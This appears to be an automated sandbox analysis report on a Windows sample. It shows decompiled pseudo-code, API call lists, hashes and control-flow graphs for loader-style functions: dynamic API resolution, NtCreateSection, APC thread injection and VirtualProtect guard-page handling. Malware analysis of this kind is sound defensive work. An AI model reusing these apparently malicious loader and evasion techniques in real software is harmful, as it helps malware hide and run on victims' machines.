                                                                                                                                        • Opcode ID: cb2e01a94367c0997ebb489a93677b537e155a27476c5409b52cb2374fde3804
                                                                                                                                        • Instruction ID: c2249b9ba54ce8cd13e3d626b5bb9c5edf2d9ac075444a506c99b0b9014fddb2
                                                                                                                                        • Opcode Fuzzy Hash: cb2e01a94367c0997ebb489a93677b537e155a27476c5409b52cb2374fde3804
                                                                                                                                        • Instruction Fuzzy Hash: 8B313D71A01215ABDB14CF55CA88B6EB7B4AF44304F10407AEA05FB2D0D7B8AA45CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.36%

                                                                                                                                        Function 004013AB, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E004013AB(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				struct HINSTANCE__* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00401A95("true");
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t25 = GetModuleHandleA( *0x404104 + 0x405014); // executed
					_t48 = _t25;
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x404104 + 0x4050dc); // executed
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00401F77(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x404104 + 0x4050ec); // executed
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x404104 + 0x4050ff); // executed
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x404104 + 0x405114); // executed
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x404104 + 0x40512a); // executed
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00401900(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}













                                                                                                                                        0x004013ba
                                                                                                                                        0x004013be
                                                                                                                                        0x00401480
                                                                                                                                        0x004013c4
                                                                                                                                        0x004013d0
                                                                                                                                        0x004013dc
                                                                                                                                        0x004013eb
                                                                                                                                        0x004013f2
                                                                                                                                        0x004013f6
                                                                                                                                        0x004013f9
                                                                                                                                        0x00401478
                                                                                                                                        0x00401479
                                                                                                                                        0x004013fb
                                                                                                                                        0x00401408
                                                                                                                                        0x0040140c
                                                                                                                                        0x0040140f
                                                                                                                                        0x00000000
                                                                                                                                        0x00401411
                                                                                                                                        0x0040141e
                                                                                                                                        0x00401422
                                                                                                                                        0x00401425
                                                                                                                                        0x00000000
                                                                                                                                        0x00401427
                                                                                                                                        0x00401434
                                                                                                                                        0x00401438
                                                                                                                                        0x0040143b
                                                                                                                                        0x00000000
                                                                                                                                        0x0040143d
                                                                                                                                        0x0040144a
                                                                                                                                        0x0040144e
                                                                                                                                        0x00401451
                                                                                                                                        0x00000000
                                                                                                                                        0x00401453
                                                                                                                                        0x00401459
                                                                                                                                        0x0040145e
                                                                                                                                        0x00401465
                                                                                                                                        0x0040146c
                                                                                                                                        0x0040146f
                                                                                                                                        0x00000000
                                                                                                                                        0x00401471
                                                                                                                                        0x00401474
                                                                                                                                        0x00401474
                                                                                                                                        0x0040146f
                                                                                                                                        0x00401451
                                                                                                                                        0x0040143b
                                                                                                                                        0x00401425
                                                                                                                                        0x0040140f
                                                                                                                                        0x004013f9
                                                                                                                                        0x0040148e

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401A95: HeapAlloc.KERNEL32(00000000,?,004021B0,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 00401AA1
                                                                                                                                        • GetModuleHandleA.KERNELBASE(?,?,00000002,?,?,?,?,?,00401C49,?,?,?,00000002,00000000,?,?), ref: 004013D0
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 004013F2
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 00401408
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 0040141E
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 00401434
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 0040144A
                                                                                                                                          • Part of subcall function 00401900: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74F44EE0,00000000,00000000,00000002), ref: 0040195D
                                                                                                                                          • Part of subcall function 00401900: memset.NTDLL ref: 0040197F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1632424568-0
                                                                                                                                        • Opcode ID: 99d59773909d28d0934ab75aecaf35677e36cf23fb5e0f66e731de5bb7df202d
                                                                                                                                        • Instruction ID: 767cb2767e9b0f152a1239e38c800a7140cf79fa693cec0873ac8bbff2be09e6
                                                                                                                                        • Opcode Fuzzy Hash: 99d59773909d28d0934ab75aecaf35677e36cf23fb5e0f66e731de5bb7df202d
                                                                                                                                        • Instruction Fuzzy Hash: 042139F160020A9FE710DF69C988E6B77ECEB54784700457AEA49EB271E774E9018F78
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.27%

                                                                                                                                        Function 00401AAA, Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			_entry_() {
				void* _t1;
				int _t4;
				void* _t6;
				int _t7;

				_t7 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4040e0 = _t1;
				if(_t1 != 0) {
					 *0x4040f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004010F9(_t6); // executed
					_t7 = _t4;
					HeapDestroy( *0x4040e0);
				}
				ExitProcess(_t7);
			}







                                                                                                                                        0x00401aab
                                                                                                                                        0x00401ab4
                                                                                                                                        0x00401abc
                                                                                                                                        0x00401ac1
                                                                                                                                        0x00401aca
                                                                                                                                        0x00401acf
                                                                                                                                        0x00401ad5
                                                                                                                                        0x00401ae0
                                                                                                                                        0x00401ae2
                                                                                                                                        0x00401ae2
                                                                                                                                        0x00401ae9

                                                                                                                                        APIs
                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401AB4
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401AC4
                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00401ACF
                                                                                                                                          • Part of subcall function 004010F9: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401155
                                                                                                                                          • Part of subcall function 004010F9: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401173
                                                                                                                                          • Part of subcall function 004010F9: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 0040119D
                                                                                                                                          • Part of subcall function 004010F9: QueueUserAPC.KERNELBASE(00401D33,00000000,?,?,00000000), ref: 004011B4
                                                                                                                                          • Part of subcall function 004010F9: GetLastError.KERNEL32(?,00000000), ref: 004011C4
                                                                                                                                          • Part of subcall function 004010F9: TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004011CE
                                                                                                                                          • Part of subcall function 004010F9: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004011D5
                                                                                                                                          • Part of subcall function 004010F9: SetLastError.KERNEL32(00000000,?,00000000), ref: 004011DA
                                                                                                                                          • Part of subcall function 004010F9: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 004011E7
                                                                                                                                          • Part of subcall function 004010F9: GetExitCodeThread.KERNEL32(00000000,?,?,00000000), ref: 004011FB
                                                                                                                                          • Part of subcall function 004010F9: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401202
                                                                                                                                          • Part of subcall function 004010F9: GetLastError.KERNEL32(?,00000000), ref: 00401219
                                                                                                                                        • HeapDestroy.KERNEL32 ref: 00401AE2
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401AE9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorHandleLastThread$CloseCreateExitHeapLongNamePath$CodeCommandDestroyLineModuleObjectProcessQueueSingleTerminateUserWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 63870677-0
                                                                                                                                        • Opcode ID: 843f5726b929336745ade2e255d2a3830ea9bb8ce47e5bff0d450a26e21d1d6b
                                                                                                                                        • Instruction ID: 9318bfb8ceca5ce0d2e900e56b3735b1b872d864aba0d18e0f40cf2fe05f6ce9
                                                                                                                                        • Opcode Fuzzy Hash: 843f5726b929336745ade2e255d2a3830ea9bb8ce47e5bff0d450a26e21d1d6b
                                                                                                                                        • Instruction Fuzzy Hash: 36E0B675803260ABC7216F71BE0CB4A3E7CBF057827004136F602F2175DB7846018BAC
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.36%

                                                                                                                                        Function 00401D33, Relevance: 6.1, APIs: 4, Instructions: 69stringthreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 95 401d33-401d90 ConvertStringSecurityDescriptorToSecurityDescriptorA call 401504 98 401d92-401da2 call 40184e 95->98 99 401dfa-401dfc 95->99 98->99 103 401da4-401dc9 lstrlenW call 40177c 98->103 100 401dfd-401dfe ExitThread 99->100 106 401dcb-401dd9 103->106 107 401def-401df3 call 401c1f 103->107 109 401deb 106->109 110 401ddb-401de9 memcpy 106->110 111 401df8 107->111 109->107 110->107 111->100
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E00401D33() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t25;
				void* _t27;
				int _t28;
				void* _t32;
				intOrPtr* _t34;
				signed int _t37;
				void* _t39;
				int _t44;

				_push(0);
				_push(0x40410c);
				_push(1);
				_push( *0x404104 + 0x405084);
				 *0x404108 = 0xc;
				 *0x404110 = 0; // executed
				L00401ED4(); // executed
				_t37 = 6;
				memset( &_v44, 0, _t37 << 2);
				if(E00401504( &_v44,  &_v28,  *0x404100 ^ 0x408af7e7) == 0) {
					L7:
					_t25 = 0xb;
					L8:
					ExitThread(_t25);
				}
				_t40 = _v28;
				_t27 = E0040184E(_v44, 0, _v28, 0); // executed
				if(_t27 != 0) {
					goto L7;
				}
				_t28 = lstrlenW( *0x4040f8);
				_t9 = _t28 + 2; // 0x2
				_t44 = _t28 + _t9;
				_t12 = _t44 + 8; // 0xa
				_t32 = E0040177C(_t40, _t12,  &_v48,  &_v52); // executed
				if(_t32 == 0) {
					_t39 =  *0x4040f8;
					_t34 = _v52;
					 *_t34 = 0;
					if(_t39 == 0) {
						 *(_t34 + 4) = 0;
					} else {
						memcpy(_t34 + 4, _t39, _t44);
					}
				}
				_t25 = E00401C1F(_v44, _t40); // executed
				goto L8;
			}















                                                                                                                                        0x00401d45
                                                                                                                                        0x00401d46
                                                                                                                                        0x00401d4b
                                                                                                                                        0x00401d53
                                                                                                                                        0x00401d54
                                                                                                                                        0x00401d5e
                                                                                                                                        0x00401d64
                                                                                                                                        0x00401d6d
                                                                                                                                        0x00401d72
                                                                                                                                        0x00401d90
                                                                                                                                        0x00401dfa
                                                                                                                                        0x00401dfc
                                                                                                                                        0x00401dfd
                                                                                                                                        0x00401dfe
                                                                                                                                        0x00401dfe
                                                                                                                                        0x00401d92
                                                                                                                                        0x00401d9b
                                                                                                                                        0x00401da2
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00401daa
                                                                                                                                        0x00401db0
                                                                                                                                        0x00401db0
                                                                                                                                        0x00401dbe
                                                                                                                                        0x00401dc2
                                                                                                                                        0x00401dc9
                                                                                                                                        0x00401dcb
                                                                                                                                        0x00401dd3
                                                                                                                                        0x00401dd7
                                                                                                                                        0x00401dd9
                                                                                                                                        0x00401deb
                                                                                                                                        0x00401ddb
                                                                                                                                        0x00401de1
                                                                                                                                        0x00401de6
                                                                                                                                        0x00401dd9
                                                                                                                                        0x00401df3
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,0040410C,00000000), ref: 00401D64
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?), ref: 00401DAA
                                                                                                                                          • Part of subcall function 0040177C: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?,?), ref: 00401789
                                                                                                                                          • Part of subcall function 0040177C: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0040179F
                                                                                                                                          • Part of subcall function 0040177C: _snwprintf.NTDLL ref: 004017C4
                                                                                                                                          • Part of subcall function 0040177C: CreateFileMappingW.KERNELBASE(000000FF,00404108,00000004,00000000,?,?), ref: 004017E9
                                                                                                                                          • Part of subcall function 0040177C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?), ref: 00401800
                                                                                                                                          • Part of subcall function 0040177C: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A), ref: 00401835
                                                                                                                                        • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 00401DE1
                                                                                                                                        • ExitThread.KERNEL32 ref: 00401DFE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2378523637-0
                                                                                                                                        • Opcode ID: 642502e69540b96eaf92f3aa5cfaac2cfe8c9cfa75699ba0caf2f26f917c8ccc
                                                                                                                                        • Instruction ID: 873d5e61fbb9f3543ff472695a2200f585b1c580edcb5926e86469b000962dd2
                                                                                                                                        • Opcode Fuzzy Hash: 642502e69540b96eaf92f3aa5cfaac2cfe8c9cfa75699ba0caf2f26f917c8ccc
                                                                                                                                        • Instruction Fuzzy Hash: 05218E72104201ABD710EB91CD49D9B7BEDEF84304F00493AB655FB1A1EB38E6448B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 004012F7, Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 112 4012f7-40130d call 401a95 115 4013a0-4013a2 112->115 116 401313-401340 EnterCriticalSection call 401eda 112->116 117 4013a3-4013a8 115->117 120 401342-401345 116->120 121 40134e-401361 VirtualProtect 116->121 120->121 122 401347-40134c 120->122 123 401363-401376 121->123 124 401378-40137e GetLastError 121->124 125 401380-40138c LeaveCriticalSection 122->125 123->125 124->125 125->117 126 40138e-40139a call 401f77 125->126 126->117 129 40139c-40139e 126->129 129->117
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E004012F7(void* __ebx, struct _CRITICAL_SECTION* _a4, unsigned int _a8, intOrPtr _a12) {
				int _t23;
				intOrPtr _t26;
				intOrPtr* _t28;
				unsigned int _t32;
				long _t33;
				intOrPtr* _t34;

				_t32 = _a8 >> 0xc;
				_t34 = E00401A95(0x18);
				if(_t34 == 0) {
					_t33 = 8;
					L11:
					return _t33;
				}
				 *(_t34 + 8) = _t32;
				 *((intOrPtr*)(_t34 + 0x10)) = _a12;
				 *((intOrPtr*)(_t34 + 0x14)) = 0;
				EnterCriticalSection(_a4);
				_t28 = E00401EDA(_a4, _t32);
				if(_t28 == _a4 + 0x18 ||  *((intOrPtr*)(_t28 + 8)) != _t32) {
					_t10 = _t34 + 0xc; // 0xc
					_t23 = VirtualProtect(_a8, 1, 1, _t10); // executed
					if(_t23 == 0) {
						_t33 = GetLastError();
					} else {
						 *((intOrPtr*)(_t34 + 4)) = _t34;
						 *_t34 = _t34;
						_t26 =  *_t28;
						 *_t34 = _t26;
						 *((intOrPtr*)(_t34 + 4)) = _t28;
						 *((intOrPtr*)(_t26 + 4)) = _t34;
						 *_t28 = _t34;
						_t33 = 0;
					}
				} else {
					_t33 = 0xb7;
				}
				LeaveCriticalSection(_a4);
				if(_t33 != 0) {
					E00401F77(_t34);
					if(_t33 == 0xb7) {
						_t33 = 0;
					}
				}
				goto L11;
			}









                                                                                                                                        0x00401301
                                                                                                                                        0x00401309
                                                                                                                                        0x0040130d
                                                                                                                                        0x004013a2
                                                                                                                                        0x004013a3
                                                                                                                                        0x004013a8
                                                                                                                                        0x004013a8
                                                                                                                                        0x0040131a
                                                                                                                                        0x0040131d
                                                                                                                                        0x00401320
                                                                                                                                        0x00401327
                                                                                                                                        0x00401336
                                                                                                                                        0x00401340
                                                                                                                                        0x0040134e
                                                                                                                                        0x00401359
                                                                                                                                        0x00401361
                                                                                                                                        0x0040137e
                                                                                                                                        0x00401363
                                                                                                                                        0x00401363
                                                                                                                                        0x00401366
                                                                                                                                        0x00401368
                                                                                                                                        0x0040136a
                                                                                                                                        0x0040136c
                                                                                                                                        0x0040136f
                                                                                                                                        0x00401372
                                                                                                                                        0x00401374
                                                                                                                                        0x00401374
                                                                                                                                        0x00401347
                                                                                                                                        0x00401347
                                                                                                                                        0x00401347
                                                                                                                                        0x00401383
                                                                                                                                        0x0040138c
                                                                                                                                        0x0040138f
                                                                                                                                        0x0040139a
                                                                                                                                        0x0040139c
                                                                                                                                        0x0040139c
                                                                                                                                        0x0040139a
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401A95: HeapAlloc.KERNEL32(00000000,?,004021B0,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 00401AA1
                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,00000018,?,?,?,0040189B,?,?,00000000,00000000,?,?,?,?,00401F40), ref: 00401327
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000001,00000001,0000000C,?,?,0040189B,?,?,00000000,00000000,?,?,?,?,00401F40), ref: 00401359
                                                                                                                                        • GetLastError.KERNEL32(?,0040189B,?,?,00000000,00000000,?,?,?,?,00401F40,?,?,00000000,?,00000000), ref: 00401378
                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,0040189B,?,?,00000000,00000000,?,?,?,?,00401F40,?,?,00000000), ref: 00401383
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$AllocEnterErrorHeapLastLeaveProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1328245997-0
                                                                                                                                        • Opcode ID: 4f96ea12cab5af2c4a859be03329dbf08eeafb8052589b2756507cc9965101a4
                                                                                                                                        • Instruction ID: d3344fbafa800d09a4fd79cbeb8323f8343f56ef1dfcba6aa456d62b1ed10a1d
                                                                                                                                        • Opcode Fuzzy Hash: 4f96ea12cab5af2c4a859be03329dbf08eeafb8052589b2756507cc9965101a4
                                                                                                                                        • Instruction Fuzzy Hash: B9215C32601704EBEB208F59D840A5ABBE9BF84751F14803BF949EB7A0C778D9418BA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.69%

                                                                                                                                        Function 00401226, Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 130 401226-401257 EnterCriticalSection call 401eda 133 4012b6-4012c6 LeaveCriticalSection 130->133 134 401259-40125c 130->134 134->133 135 40125e-401265 134->135 136 401267-40126a 135->136 137 40126c-40126f 135->137 138 401270-401276 136->138 137->138 139 401298-4012a0 138->139 140 401278-401289 VirtualProtect 138->140 139->133 142 4012a2-4012b2 call 4018c2 139->142 140->139 141 40128b-401296 GetLastError 140->141 141->133 141->139 142->133
                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                        			E00401226(unsigned int __eax, void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _t24;
				int _t28;
				long _t29;
				void* _t31;
				signed int _t40;
				signed int _t42;
				void* _t45;

				_push(__ecx);
				_t31 = __eax;
				_v8 = 0x490;
				_t40 = __eax >> 0xc;
				EnterCriticalSection(_a4);
				_t45 = E00401EDA(_a4, _t40);
				if(_t45 == _a4 + 0x18 ||  *((intOrPtr*)(_t45 + 8)) != _t40) {
					L10:
					LeaveCriticalSection(_a4);
					return _v8;
				} else {
					_t24 =  *((intOrPtr*)(_t45 + 0x14));
					if(_a8 == 0) {
						_t42 = _t40 | 0xffffffff;
						_t24 = _t24 - 1;
					} else {
						_t42 = 1;
					}
					_v8 = _v8 & 0x00000000;
					if(_t24 != 0) {
						L8:
						 *((intOrPtr*)(_t45 + 0x14)) =  *((intOrPtr*)(_t45 + 0x14)) + _t42;
						_t25 =  *(_t45 + 0x10);
						if( *(_t45 + 0x10) != 0) {
							E004018C2(_t31 & 0xfffff000, _t31 & 0xfffff000, _t25);
							 *(_t45 + 0x10) =  *(_t45 + 0x10) & 0x00000000;
						}
						goto L10;
					} else {
						_t10 = _t45 + 0xc; // 0xc
						_t28 = VirtualProtect(_t31, 1,  *_t10, _t10); // executed
						if(_t28 != 0) {
							goto L8;
						}
						_t29 = GetLastError();
						_v8 = _t29;
						if(_t29 != 0) {
							goto L10;
						}
						goto L8;
					}
				}
			}











                                                                                                                                        0x00401229
                                                                                                                                        0x00401230
                                                                                                                                        0x00401234
                                                                                                                                        0x0040123b
                                                                                                                                        0x0040123e
                                                                                                                                        0x0040124d
                                                                                                                                        0x00401257
                                                                                                                                        0x004012b6
                                                                                                                                        0x004012b9
                                                                                                                                        0x004012c6
                                                                                                                                        0x0040125e
                                                                                                                                        0x00401262
                                                                                                                                        0x00401265
                                                                                                                                        0x0040126c
                                                                                                                                        0x0040126f
                                                                                                                                        0x00401267
                                                                                                                                        0x00401269
                                                                                                                                        0x00401269
                                                                                                                                        0x00401270
                                                                                                                                        0x00401276
                                                                                                                                        0x00401298
                                                                                                                                        0x00401298
                                                                                                                                        0x0040129b
                                                                                                                                        0x004012a0
                                                                                                                                        0x004012ad
                                                                                                                                        0x004012b2
                                                                                                                                        0x004012b2
                                                                                                                                        0x00000000
                                                                                                                                        0x00401278
                                                                                                                                        0x00401278
                                                                                                                                        0x00401281
                                                                                                                                        0x00401289
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0040128b
                                                                                                                                        0x00401293
                                                                                                                                        0x00401296
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00401296
                                                                                                                                        0x00401276

                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000,00401D1A,?,00000000), ref: 0040123E
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000001,0000000C,0000000C,00000000,?,?,?,?,00000000,00401D1A,?,00000000), ref: 00401281
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00401D1A,?,00000000), ref: 0040128B
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,?,00000000,00401D1A,?,00000000), ref: 004012B9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3666628472-0
                                                                                                                                        • Opcode ID: 691570f02f7321f44599c1689d7172c09e9128d7d7b148b450363dad249b82e2
                                                                                                                                        • Instruction ID: 801d6b01a7e1f0d920c2274e07b06c93cab4a8dbfbfe62b4cba8eb1b054a82cf
                                                                                                                                        • Opcode Fuzzy Hash: 691570f02f7321f44599c1689d7172c09e9128d7d7b148b450363dad249b82e2
                                                                                                                                        • Instruction Fuzzy Hash: 5E118132600604EBDB20DF6ADC84B5BBBE8EB45355F10827EE455F32E0D778DA048B64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.69%

                                                                                                                                        Function 00401CB1, Relevance: 3.8, APIs: 3, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 167 401cb1-401cbf 168 401cc1-401cd0 167->168 169 401d2b-401d30 167->169 170 401cd2-401cda call 401226 168->170 171 401cfc-401d02 168->171 175 401cdf-401ce1 170->175 173 401d04-401d11 TlsGetValue 171->173 174 401d2a 171->174 173->174 176 401d13-401d15 call 401226 173->176 174->169 175->174 177 401ce3-401cfa TlsSetValue 175->177 180 401d1a-401d1c 176->180 179 401d27 177->179 179->174 180->174 181 401d1e-401d21 TlsSetValue 180->181 181->179
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E00401CB1(intOrPtr* _a4) {
				intOrPtr _t8;
				void* _t11;
				void* _t14;
				intOrPtr _t17;
				intOrPtr* _t18;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t22;
				long* _t24;
				signed int _t25;

				_t8 =  *0x404114;
				_t25 = 0;
				_t17 = _t8;
				if(_t8 != 0) {
					_t22 = _a4;
					_t18 =  *_t22;
					_t19 =  *_t18;
					if(_t19 != 0xc0000005) {
						if(_t19 == 0x80000004) {
							_t24 = _t8 + 0x24;
							if(TlsGetValue( *_t24) != 0) {
								_t11 = E00401226(_t10, _t18, _t17, 0); // executed
								if(_t11 == 0) {
									TlsSetValue( *_t24, 0);
									goto L8;
								}
							}
						}
					} else {
						_t20 =  *(_t18 + 0x18);
						_t14 = E00401226(_t20, _t18, _t8, 1); // executed
						if(_t14 == 0) {
							TlsSetValue( *(_t17 + 0x24), _t20);
							 *( *((intOrPtr*)(_t22 + 4)) + 0xc0) =  *( *((intOrPtr*)(_t22 + 4)) + 0xc0) | 0x00000100;
							L8:
							_t25 = _t25 | 0xffffffff;
						}
					}
				}
				return _t25;
			}













                                                                                                                                        0x00401cb1
                                                                                                                                        0x00401cb8
                                                                                                                                        0x00401cbd
                                                                                                                                        0x00401cbf
                                                                                                                                        0x00401cc2
                                                                                                                                        0x00401cc6
                                                                                                                                        0x00401cc8
                                                                                                                                        0x00401cd0
                                                                                                                                        0x00401d02
                                                                                                                                        0x00401d04
                                                                                                                                        0x00401d11
                                                                                                                                        0x00401d15
                                                                                                                                        0x00401d1c
                                                                                                                                        0x00401d21
                                                                                                                                        0x00000000
                                                                                                                                        0x00401d21
                                                                                                                                        0x00401d1c
                                                                                                                                        0x00401d11
                                                                                                                                        0x00401cd2
                                                                                                                                        0x00401cd2
                                                                                                                                        0x00401cda
                                                                                                                                        0x00401ce1
                                                                                                                                        0x00401ce7
                                                                                                                                        0x00401cf0
                                                                                                                                        0x00401d27
                                                                                                                                        0x00401d27
                                                                                                                                        0x00401d27
                                                                                                                                        0x00401ce1
                                                                                                                                        0x00401d2a
                                                                                                                                        0x00401d30

                                                                                                                                        APIs
